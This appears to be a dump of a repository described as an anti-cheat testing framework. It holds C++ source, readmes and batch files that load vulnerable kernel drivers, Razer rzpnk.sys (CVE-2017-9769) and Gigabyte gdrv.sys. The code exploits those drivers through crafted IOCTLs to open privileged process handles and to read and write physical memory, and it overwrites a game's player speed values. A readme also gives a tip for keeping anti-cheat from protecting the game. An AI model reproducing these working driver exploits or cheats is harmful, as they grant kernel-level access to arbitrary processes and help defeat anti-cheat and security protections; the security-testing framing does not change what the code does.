DriverHelper will provide the following method: 13 | 14 | - static int memmem(PBYTE haystack, DWORD haystack_size, PBYTE needle, DWORD needle_size); 15 | - static int getDeviceHandle(LPTSTR name); 16 | - static unsigned __int64 __fastcall ExpLookupHandleTableEntryW7(__int64 HandleTable, unsigned __int64 handle); 17 | - static unsigned __int64 __fastcall ExpLookupHandleTableEntryW10(__int64 HandleTable, __int64 handle); 18 | - static ULONG64 findPhisical_ObjectTable(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 19 | - static DWORDLONG findPhisical(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 20 | 21 | 22 | ## Usefull Structures: 23 | 24 | EPROCESS pattern: 25 | ``` 26 | typedef struct { 27 | CHAR ImageFileName[15]; 28 | DWORD PriorityClass; 29 | } _EPROCESS_PATTERN; 30 | ``` 31 | 32 | Read physicalAddress: 33 | ``` 34 | typedef struct _READ_REQUEST { 35 | DWORD InterfaceType; 36 | DWORD Bus; 37 | ULONG64 PhysicalAddress; 38 | DWORD IOSpace; 39 | DWORD size; 40 | } READ_REQUEST; 41 | ``` 42 | 43 | Write physicalAddress: 44 | ``` 45 | typedef struct _WRITE_REQUEST { 46 | DWORDLONG address; 47 | DWORD length; 48 | DWORDLONG buffer; 49 | } WRITE_REQUEST; 50 | ``` 51 | 52 | Structure for memcpy using VA: 53 | ``` 54 | typedef struct _MEMCPY_REQUEST { 55 | ULONG64 dest; 56 | ULONG64 src; 57 | DWORD size; 58 | } MEMCPY_REQUEST; 59 | ``` 60 | 61 | HANDLE_TABLE_ENTRY: 62 | ``` 63 | typedef struct _HANDLE_TABLE_ENTRY 64 | { 65 | ULONGLONG Value; 66 | ULONGLONG GrantedAccess : 25; 67 | } HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY; 68 | ``` 69 | 70 | HANDLE_TABLE:_ 71 | ``` 72 | typedef struct _HANDLE_TABLE 73 | { 74 | CHAR fill[100]; 75 | } HANDLE_TABLE, *PHANDLE_TABLE; 76 | ``` -------------------------------------------------------------------------------- /DriverHelper/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /DriverHelper/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | 12 | 13 | 14 | // reference additional headers your program requires here 15 | -------------------------------------------------------------------------------- /DriverHelper/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.cpp: -------------------------------------------------------------------------------- 1 | // DriverTester.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "ntdll.lib") 11 | 12 | DWORD targetPid = NULL; 13 | PipeMessageRequest PMRequest; 14 | PipeMessageResponse PMResponse; 15 | 16 | typedef NTSTATUS(WINAPI *fn_NtDeviceIoControlFile)( 17 | __in HANDLE FileHandle, 18 | __in HANDLE Event, 19 | __in PIO_APC_ROUTINE ApcRoutine, 20 | __in PVOID ApcContext, 21 | __out PIO_STATUS_BLOCK IoStatusBlock, 22 | __in ULONG IoControlCode, 23 | __in PVOID InputBuffer, 24 | __in ULONG InputBufferLength, 25 | __out PVOID OutputBuffer, 26 | __in ULONG OutputBufferLength 27 | ); 28 | 29 | fn_NtDeviceIoControlFile NtDeviceIoControlFileInstance; 30 | 31 | struct buffer { 32 | INT64 pid1; 33 | INT64 pid2; 34 | } inB, outB; 35 | 36 | HANDLE hTarget = NULL; 37 | 38 | 39 | bool ExploitRazerDriver() { 40 | HANDLE hDevice = CreateFile("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", FILE_SHARE_WRITE | FILE_SHARE_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 41 | if (hDevice == INVALID_HANDLE_VALUE) 42 | { 43 | std::cout << "INVALID_HANDLE_VALUE: " << GetLastError() << std::endl; 44 | return 1; 45 | } 46 | 47 | 48 | HANDLE targetHandle = NULL; 49 | 50 | HMODULE hNtDll = GetModuleHandleW(L"ntdll.dll"); 51 | if (hNtDll == NULL) 52 | { 53 | std::cout << "GetModuleHandleW!\n"; 54 | } 55 | 56 | NtDeviceIoControlFileInstance = (fn_NtDeviceIoControlFile)GetProcAddress(hNtDll, "NtDeviceIoControlFile"); 57 | 58 | DWORD returnedBytes = 0; 59 | memset(&inB, 0, sizeof(buffer)); 60 | memset(&outB, 0, sizeof(buffer)); 61 | inB.pid1 = targetPid; 62 | 63 | DeviceIoControl(hDevice, 0x22a050, &inB, sizeof(buffer), &outB, sizeof(buffer), &returnedBytes, NULL); 64 | if (returnedBytes == 0) 65 | { 66 | std::cout << "[-] Exploit failed: " << std::hex << GetLastError() << std::endl; 67 | }; 68 | 69 | std::cout << "[+] Target process PID: " << std::hex << outB.pid1 << std::endl; 70 | std::cout << "[+] Target handle: " << std::hex << outB.pid2 << std::endl; 71 | hTarget = (HANDLE)outB.pid2; 72 | return 0; 73 | } 74 | 75 | 76 | 77 | void handleTests(HANDLE handle) 78 | { 79 | SIZE_T stRead = 0; 80 | SIZE_T stWrite = 0; 81 | 82 | PMRequest.action = 1; 83 | CheatHelper::prepareRequest(PMRequest); 84 | 85 | CheatHelper::RPM((HANDLE)handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 86 | 87 | PMRequest.action = 2; 88 | CheatHelper::prepareRequest(PMRequest); 89 | 90 | CheatHelper::WPM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 91 | 92 | PMRequest.action = 4; 93 | CheatHelper::prepareRequest(PMRequest); 94 | 95 | CheatHelper::NtRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 96 | 97 | 98 | PMRequest.action = 5; 99 | CheatHelper::prepareRequest(PMRequest); 100 | 101 | CheatHelper::NtWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 102 | 103 | PMRequest.action = 6; 104 | CheatHelper::prepareRequest(PMRequest); 105 | CheatHelper::ZwRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 106 | 107 | PMRequest.action = 7; 108 | CheatHelper::prepareRequest(PMRequest); 109 | CheatHelper::ZwWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 110 | 111 | 112 | } 113 | 114 | 115 | 116 | int main() 117 | { 118 | 119 | std::cout << "[+] Init\n"; 120 | CheatHelper::loadConfig(); 121 | 122 | std::cout << "[+] Waiting for target process\n"; 123 | while (true) 124 | { 125 | targetPid = CheatHelper::GetProcId(CheatHelper::targetProc); 126 | if (targetPid != NULL) 127 | { 128 | std::cout << "[+] PID: 0x" << std::dec << targetPid << std::endl; 129 | break;// 130 | } 131 | Sleep(1000); 132 | } 133 | 134 | PMRequest.address = 0x0; 135 | SecureZeroMemory(PMRequest.buffer, BUFSIZE - 1); 136 | PMRequest.size = 0x0; 137 | // Connecting the vulnerable driver (Razer Synapse rzpnk.sys ZwOpenProcess - ZwOpenProcess) 138 | ExploitRazerDriver(); 139 | 140 | handleTests(hTarget); 141 | } 142 | 143 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 144 | // Debug program: F5 or Debug > Start Debugging menu 145 | 146 | // Tips for Getting Started: 147 | // 1. Use the Solution Explorer window to add/manage files 148 | // 2. Use the Team Explorer window to connect to source control 149 | // 3. Use the Output window to see build output and other messages 150 | // 4. Use the Error List window to view errors 151 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 152 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 153 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11} 24 | Win32Proj 25 | DriverTester 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | $(VC_IncludePath);$(WindowsSDK_IncludePath); 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | NotUsing 89 | Level3 90 | Disabled 91 | true 92 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | pch.h 95 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 96 | 97 | 98 | Console 99 | true 100 | $(VCInstallDir)lib;C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64;%(AdditionalLibraryDirectories); 101 | 102 | 103 | 104 | 105 | NotUsing 106 | Level3 107 | Disabled 108 | true 109 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | pch.h 112 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 | true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | {a080c117-d1db-4671-8217-65496573ba4d} 177 | 178 | 179 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | Source Files 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /DriverTester/LoadDriver.bat: -------------------------------------------------------------------------------- 1 | sc create DriverTester binpath= "..\resources\rzpnk.sys" type= kernel 2 | sc start DriverTester -------------------------------------------------------------------------------- /DriverTester/Readme.md: -------------------------------------------------------------------------------- 1 | # DriverTester 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module exploits **Razer Synapse rzpnk.sys (2.20.15.1104) - CVE-2017-9769** to open a new HANDLE to the game from kernel mode. Then it attempts to access to the memory of the game by using this handle. 9 | 10 | > A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process. 11 | References 12 | 13 | __Actions that this module attemps:__ 14 | 15 | - ReadProcessMemory 16 | - WriteProcessMemory 17 | - ntReadVirtualMemory 18 | - ntWriteVirtualMemory 19 | - ZwReadVirtualMemory 20 | - ZwWriteVirtualMemory 21 | 22 | ## Configuration 23 | 24 | This module requires configuration: 25 | 26 | - The following variables in config.ini need to the provided: 27 | 28 | [Addresses] 29 | ``` 30 | RPMAddressHigh=0x1 31 | RPMAddressLow=0x58A60000 32 | RPMAddress=0x0 33 | WPMAddressHigh=0x00000000 34 | WPMAddressLow=0x58A60000 35 | WPMAddress=0x0 36 | ntRVMAddressHigh=0x00000000 37 | ntRVMAddressLow=0x58A60000 38 | ntRVMAddress=0x0 39 | ntWVMAddressHigh=0x00000000 40 | ntWVMAddressLow=0x58A60000 41 | ntWVMAddress=0x0 42 | ZwRVMAddressHigh=0x00000000 43 | ZwRVMAddressLow=0x58A60000 44 | ZwRVMAddress=0x0 45 | ZwWVMAddressHigh=0x00000000 46 | ZwWVMAddressLow=0x58A60000 47 | ZwWVMAddress=0x0 48 | ``` 49 | 50 | 51 | [Buffers] 52 | ``` 53 | #SIZE MUST BE SIZE+1 54 | RPMBuffer=TTTT1 55 | RPMBufferSize=0x6 56 | WPMBuffer=TTTT2 57 | WPMBufferSize=0x6 58 | ntRVMBuffer=TTTT4 59 | ntRVMBufferSize=0x6 60 | ntWVMBuffer=TTTT5 61 | ntWVMBufferSize=0x6 62 | ZwRVMBuffer=TTTT6 63 | ZwRVMBufferSize=0x6 64 | ZwWVMBuffer=TTTT7 65 | ZwWVMBufferSize=0x6 66 | ``` 67 | 68 | [Strings] 69 | ``` 70 | targetProc=r5apex.exe 71 | ``` 72 | 73 | ## Combination with other techniques 74 | 75 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 76 | 77 | 78 | ## Links 79 | 80 | https://warroom.rsmus.com/cve-2017-9769/ -------------------------------------------------------------------------------- /DriverTester/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DriverTester/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /ExternalCheatDriver/ExternalCheatDriver.cpp: -------------------------------------------------------------------------------- 1 | // ExternalCheatDriver.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include "DriverHelper.h" 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | 14 | 15 | // Definition of IOCTL numbers 16 | // GPCIDrv64 Driver 17 | #define IOCTL_MAPPHYSICAL 0x9C402580 18 | #define IOCTL_UNMAPPHYSICAL 0x9C402584 19 | // GIO Driver 20 | #define IOCTL_GIO_MAPPHYSICAL 0xC3502004 21 | #define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008 22 | #define IOCTL_GIO_MEMCPY 0xC3502808 23 | 24 | // Kernel offsets 25 | // W10 26 | #define OFFSET_IMAGEFILENAME 0x450 27 | #define OFFSET_OBJECTTABLE 0x418 28 | 29 | #pragma comment(lib, "ntdll.lib") 30 | 31 | 32 | ULONG64 GIO_mapPhysical(ULONG64 physicaladdress, DWORD size) 33 | { 34 | READ_REQUEST inbuffer = { 0, 0, physicaladdress, 0, size }; 35 | ULONG64 outbuffer[2] = { 0 }; 36 | DWORD bytes_returned = 0; 37 | DeviceIoControl(DriverHelper::hDeviceDrv, 38 | IOCTL_GIO_MAPPHYSICAL, 39 | &inbuffer, 40 | sizeof(inbuffer), 41 | &outbuffer, 42 | sizeof(outbuffer), 43 | &bytes_returned, 44 | (LPOVERLAPPED)NULL); 45 | 46 | return outbuffer[0]; 47 | } 48 | 49 | ULONG64 GIO_unmapPhysical(ULONG64 address) 50 | { 51 | ULONG64 inbuffer = address; 52 | ULONG64 outbuffer[2] = { 0 }; 53 | DWORD bytes_returned = 0; 54 | DeviceIoControl(DriverHelper::hDeviceDrv, 55 | IOCTL_GIO_UNMAPPHYSICAL, 56 | (LPVOID)&inbuffer, 57 | sizeof(inbuffer), 58 | (LPVOID)outbuffer, 59 | sizeof(outbuffer), 60 | &bytes_returned, 61 | (LPOVERLAPPED)NULL); 62 | 63 | return outbuffer[0]; 64 | } 65 | 66 | BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size) 67 | { 68 | MEMCPY_REQUEST mystructIn = { dest, src, size }; 69 | BYTE outbuffer[0x30] = { 0 }; 70 | DWORD returned = 0; 71 | 72 | DeviceIoControl(DriverHelper::hDeviceDrv, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); 73 | if (returned) { 74 | return TRUE; 75 | } 76 | return FALSE; 77 | } 78 | 79 | bool bFirstActivation = true; 80 | 81 | bool ActivateHack(uintptr_t speedAddress, uintptr_t attackSpeedAddress, boolean activate, int32_t &initialSpeed, int32_t &initialAttackSpeed) 82 | { 83 | if (activate) 84 | { 85 | if (bFirstActivation) 86 | { 87 | std::cout << "[+] Activating Hack" << std::endl; 88 | std::cout << "\t[+] PlayerSpeed Address:\t 0x" << std::hex << speedAddress << std::endl; 89 | std::cout << "\t[+] PlayerAttackSpeed Address:\t 0x" << std::hex << attackSpeedAddress << std::endl; 90 | 91 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 92 | speedAddress, 93 | &initialSpeed, sizeof(initialSpeed), NULL)) 94 | { 95 | std::cout << "[-] Reading PlayerSpeed: Failed" << std::endl; 96 | return false; 97 | } 98 | 99 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 100 | attackSpeedAddress, 101 | &initialAttackSpeed, sizeof(initialAttackSpeed), NULL)) 102 | { 103 | std::cout << "[-] Reading PlayerAttackSpeed: Failed" << std::endl; 104 | return false; 105 | } 106 | 107 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << initialSpeed << std::endl; 108 | std::cout << "\t[+] Current PlayerAttackSpeed:\t 0x" << std::hex << initialAttackSpeed << std::endl; 109 | } 110 | 111 | int32_t newSpeed = (std::numeric_limits::max)(); 112 | int32_t newAttackSpeed = 9999999; 113 | 114 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 115 | speedAddress, 116 | &newSpeed, sizeof(newSpeed), NULL)) 117 | { 118 | std::cout << "[-] Activating SpeedHack: Failed" << std::endl; 119 | return false; 120 | } 121 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 122 | attackSpeedAddress, 123 | &newAttackSpeed, sizeof(newAttackSpeed), NULL)) 124 | { 125 | std::cout << "[-] Activating AttackSpeedHack: Failed" << std::endl; 126 | return false; 127 | } 128 | 129 | if (bFirstActivation) 130 | { 131 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << newSpeed << std::endl; 132 | std::cout << "\t[+] Current PlayerAttackSpeed:\t 0x" << std::hex << newAttackSpeed << std::endl; 133 | } 134 | } 135 | else 136 | { 137 | std::cout << "[+] Deactivating Hack" << std::endl; 138 | 139 | int32_t currentSpeed = 0; 140 | int32_t currentAttackSpeed = 0; 141 | 142 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 143 | speedAddress, 144 | ¤tSpeed, sizeof(currentSpeed), NULL)) 145 | { 146 | std::cout << "[-] Deactivating SpeedHack: Failed" << std::endl; 147 | return false; 148 | } 149 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 150 | attackSpeedAddress, 151 | ¤tAttackSpeed, sizeof(currentAttackSpeed), NULL)) 152 | { 153 | std::cout << "[-] Deactivating AttackSpeedHack: Failed" << std::endl; 154 | return false; 155 | } 156 | 157 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << currentSpeed << std::endl; 158 | std::cout << "\t[+] Current AttackPlayerSpeed:\t 0x" << std::hex << currentAttackSpeed << std::endl; 159 | 160 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 161 | speedAddress, 162 | &initialSpeed, sizeof(initialSpeed), NULL)) 163 | { 164 | std::cout << "[-] Deactivating SpeedHack: Failed" << std::endl; 165 | return false; 166 | } 167 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 168 | attackSpeedAddress, 169 | &initialAttackSpeed, sizeof(initialAttackSpeed), NULL)) 170 | { 171 | std::cout << "[-] Deactivating AttackSpeedHack: Failed" << std::endl; 172 | return false; 173 | } 174 | 175 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << initialSpeed << std::endl; 176 | std::cout << "\t[+] Current AttackPlayerSpeed:\t 0x" << std::hex << initialAttackSpeed << std::endl; 177 | 178 | } 179 | 180 | bFirstActivation = false; 181 | 182 | return true; 183 | } 184 | 185 | 186 | int main() 187 | { 188 | std::cout << "[+] Init" << std::endl; 189 | CheatHelper::loadConfig(); 190 | 191 | 192 | // Connecting the vulnerable driver (GPCIDrv64.sys AORUS GRAPHICS ENGINE v1.25) 193 | std::cout << "[+] Obtaining HANDLE to Drv" << std::endl; 194 | if (DriverHelper::getDeviceHandle(CheatHelper::driverName)) 195 | { 196 | std::cout << "[-] Obtaining HANDLE: failed." << std::endl; 197 | return 1; 198 | } 199 | 200 | // If we want to change the driver, we just need to create our functions for communication and set the following variables 201 | DriverHelper::fn_memcpy = (_fn_memcpy)GIO_memcpy; 202 | DriverHelper::fn_mapPhysical = (_fn_mapPhysical)GIO_mapPhysical; 203 | DriverHelper::fn_unmapPhysical = (_fn_unmapPhysical)GIO_unmapPhysical; 204 | 205 | uintptr_t directoryTableBase = 0; 206 | uintptr_t pKProcess = DriverHelper::GetKProcess(directoryTableBase); 207 | 208 | uintptr_t pBaseAddress = DriverHelper::SearchKProcess(CheatHelper::targetProc, directoryTableBase, pKProcess); 209 | 210 | if (!DriverHelper::ObtainKProcessInfo(directoryTableBase, pBaseAddress)) 211 | { 212 | std::cout << "[-] ObtainKProcessInfo failed" << std::endl; 213 | } 214 | 215 | // objectTable 0xcccccccccccccccc unsigned __int64 216 | if (pBaseAddress == 0) 217 | { 218 | std::cout << "[-] Target process not found :(" << std::endl; 219 | return 1; 220 | } 221 | 222 | if (!DriverHelper::CheckProcessHeader(DriverHelper::DTBTargetProcess, 223 | DriverHelper::pBaseAddressTargetProcess)) 224 | { 225 | std::cout << "[-] Failed process header checking" << std::endl; 226 | return 1; 227 | } 228 | 229 | std::cout << "[+] Process Header Check: SUCCESS" << std::endl; 230 | 231 | bool activate = true; 232 | 233 | // From this part you will need to customize everything 234 | // This is just a practical example to show how it is possible to validate if the 235 | // memory of a game is accessible with this techinque 236 | uintptr_t localPlayerOffset = 0x390d858; 237 | uintptr_t speedAddressOffset = 0xB58; 238 | uintptr_t attackSpeedAddressOffset = 0xB5C; 239 | uintptr_t speedAddress = 0; 240 | uintptr_t attackSpeedAddress = 0; 241 | uintptr_t playerAddress = 0; 242 | 243 | playerAddress = DriverHelper::pBaseAddressTargetProcess + localPlayerOffset; 244 | 245 | uintptr_t pLocalPlayer = 0; 246 | 247 | std::cout << "[+] Locating localPlayer Address" << std::endl; 248 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 249 | playerAddress, 250 | &pLocalPlayer, sizeof(pLocalPlayer), NULL)) 251 | { 252 | std::cout << "[-] Obtaining localPlayer: Failed" << std::endl; 253 | return false; 254 | } 255 | 256 | std::cout << "\t[+] localPlayerAddress: 0x" << std::hex << playerAddress << std::endl; 257 | 258 | speedAddress = pLocalPlayer + speedAddressOffset; 259 | attackSpeedAddress = pLocalPlayer + attackSpeedAddressOffset; 260 | 261 | int32_t initialSpeed = 0; 262 | int32_t initialAttackSpeed = 0; 263 | 264 | // Activating Cheat 265 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 266 | return 1; 267 | 268 | // We need this while to lock the value we want on memory. The game could change the value anytime 269 | // and we have to overwrite it. 270 | while (true) 271 | { 272 | // InsertKey to disable cheat 273 | if (GetKeyState(VK_INSERT) & 0x8000) 274 | break; 275 | 276 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 277 | return 1; 278 | 279 | Sleep(100); 280 | } 281 | 282 | // Deactivating cheat 283 | activate = false; 284 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 285 | return 1; 286 | 287 | return 0; 288 | 289 | } -------------------------------------------------------------------------------- /ExternalCheatDriver/HandleElevationDriver.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /ExternalCheatDriver/LoadDriver.bat: -------------------------------------------------------------------------------- 1 | sc create Gigabyte binpath= "E:\Recon2019\AntiCheat-Testing-Framework\resources\gdrv.sys" type= kernel 2 | sc start Gigabyte -------------------------------------------------------------------------------- /ExternalCheatDriver/Readme.md: -------------------------------------------------------------------------------- 1 | # External Cheat Driver 2 | 3 | ## Introduction 4 | 5 | Implementation that abuse of a vulnerable driver to Read/Write from physical memory in order to directly read/modify the target process. 6 | The main purpose is to avoid performing a DKOM, which would be much easier to be detected. 7 | This implementation uses gigabyte driver to achieve its goal, however, changing the vulnerable driver should be quite easy, given that all the methods are created in a modular way inside DriverHelper. 8 | 9 | ## Usage 10 | 11 | This module makes use of **DriverHelper** and **CheatHelper**. 12 | 13 | > Note that this module has been created as a PoC to manipulate one particular game (BlackDesertOnline), however, the method `ActivateHack` can be modified in order to create any desired PoC. 14 | 15 | 16 | ## Configuration 17 | 18 | This module requires configuration: 19 | 20 | - The following variables in config.ini need to the provided: 21 | 22 | [Strings] 23 | ``` 24 | targetProc=BlackDesert64.exe 25 | driverName=\\.\GIO 26 | ``` 27 | 28 | ## Notes 29 | 30 | - driverName: Name of the driver device to exploit 31 | - targetProc: Process name of the game 32 | 33 | -------------------------------------------------------------------------------- /ExternalCheatDriver/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /ExternalCheatDriver/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.cpp: -------------------------------------------------------------------------------- 1 | // HandleElevationDriver.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include "DriverHelper.h" 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | 14 | 15 | // Definition of IOCTL numbers 16 | // GPCIDrv64 Driver 17 | #define IOCTL_MAPPHYSICAL 0x9C402580 18 | #define IOCTL_UNMAPPHYSICAL 0x9C402584 19 | // GIO Driver 20 | #define IOCTL_GIO_MAPPHYSICAL 0xC3502004 21 | #define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008 22 | #define IOCTL_GIO_MEMCPY 0xC3502808 23 